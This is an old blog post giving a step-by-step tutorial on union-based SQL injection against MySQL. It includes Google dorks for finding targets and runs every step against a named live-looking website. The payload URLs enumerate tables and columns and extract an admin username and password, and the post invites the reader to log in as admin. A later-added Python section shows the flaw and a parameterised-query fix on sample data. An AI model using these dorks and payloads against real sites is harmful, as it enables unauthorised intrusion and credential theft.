BASIC HACK

Tuesday 4 September 2012

SIMPLE QUERY BASED SQL INJECTION TUTORIAL

The sole purpose of this tutorial is to show you how to perform the query based SQL injection technique to retrieve the admin username and password. This is very easy once you understand everything. This tutorial is only for MySQL version > 5.

The 1st step is to find a SQL vulnerable link. This type of link can be found with the following type of Google dork:

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="

all without the " characters.
Here we are taking the following site:

http://www.dynamicinst.net/news.php?id=25


After finding this link we have to add a ' after 25, i.e.
http://www.dynamicinst.net/news.php?id=25'

If this link gives an error such as
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
then it is vulnerable to SQL injection.

After that we have to find the number of columns, and this can be performed with the following commands:

http://www.dynamicinst.net/news.php?id=25  order by 1 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 2 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 3 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 4 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 5 (no error)
http://www.dynamicinst.net/news.php?id=25  order by 6 (error)

It means the query returns 5 columns (order by 6 fails because there is no 6th column to sort on).

Then we have to find the most vulnerable column. For this enter this command:

http://www.dynamicinst.net/news.php?id=-25  union all select 1,2,3,4,5--

This will show some of the numbers among 1,2,3,4,5 on the page.
For this link it is 3 and 5.
Suppose we select 3 (you can also select 5).
N.B.
If we do not place a negative sign before 25 then it will show nothing, because the page displays the real row with id 25 instead of the row added by the union.

Then we have to find the version of MySQL:
http://www.dynamicinst.net/news.php?id=-25  union all select 1,2,@@version,4,5--
or
http://www.dynamicinst.net/news.php?id=-25  union all select 1,2,version(),4,5--
output is 5.0.27

In this way you can find the database name and the MySQL user by replacing version() with database() and user().


Then we have to find all the table names:

http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables--


output:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,careers,contacts,dealer_news,events,extranet_users,faq,login,manuals,myphpvote,news,product_type,products,solution

Our aim is to find the admin username and password. For this we have to select the appropriate table name among the above table names, and here it is login.

Then we have to find all columns of the login table:

http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='login'--

If this does not work, convert login to char form (the comma-separated ASCII codes of l,o,g,i,n):

http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(108,111,103,105,110)--


But the previous command worked here.

output:
user,password

here we got the right column names.

Then we have to extract the user name and password from these columns:

http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,concat(user,0x3a,password),4,5 from login--


Here 0x3a (the hex code of the ':' character) works as a separator.

output:
Tom:Webb

here user=Tom
     password=Webb

We have successfully extracted the username and password.

Now you can log in as admin.
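To see why the whole chain above works, and what stops it, here is an added example (not part of the original post, and not the site's code) that rebuilds the news.php pattern on a constructed in-memory SQLite database: a "news" table selected with 3 columns and a "login" table with a sample Tom/Webb row. The vulnerable function pastes the id parameter into the SQL text exactly as the tutorial assumes; the hardened function validates the type and binds the value as a parameter, so the same input never becomes SQL.

```python
import sqlite3


def make_db():
    # Constructed sample data modelled on the tutorial (not real credentials).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (25, 'Welcome', 'First post');
        CREATE TABLE login(user TEXT, password TEXT);
        INSERT INTO login VALUES ('Tom', 'Webb');
    """)
    return db


def fetch_news_vulnerable(db, raw_id):
    # The bug behind news.php?id=: the raw parameter is concatenated into SQL,
    # so "-25 union all select ..." becomes part of the statement.
    sql = "SELECT id, title, body FROM news WHERE id=" + raw_id
    return db.execute(sql).fetchone()


def fetch_news_hardened(db, raw_id):
    # 1) Enforce the expected type before the value goes near the query.
    try:
        news_id = int(raw_id)
    except ValueError:
        return None
    # 2) Bind the value as a parameter; the driver sends it as data, never as SQL.
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return db.execute(sql, (news_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    injected = "-25 union all select 1, user, password from login--"
    # Negative id: the real query matches nothing, so the first row shown is
    # the union row carrying the login table's contents.
    print(fetch_news_vulnerable(db, injected))
    # Positive id: the real row comes first and hides the union row (the N.B.).
    print(fetch_news_vulnerable(db, "25 union all select 1, user, password from login--"))
    # Hardened: the same payload is rejected, a normal id still works.
    print(fetch_news_hardened(db, injected))
    print(fetch_news_hardened(db, "25"))
```

Run it and compare the first two prints to see the tutorial's negative-sign rule reproduced; the third print is None because the payload is not an integer.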

For finding the admin link of the website you can use the 'Havij' software.

thank you...
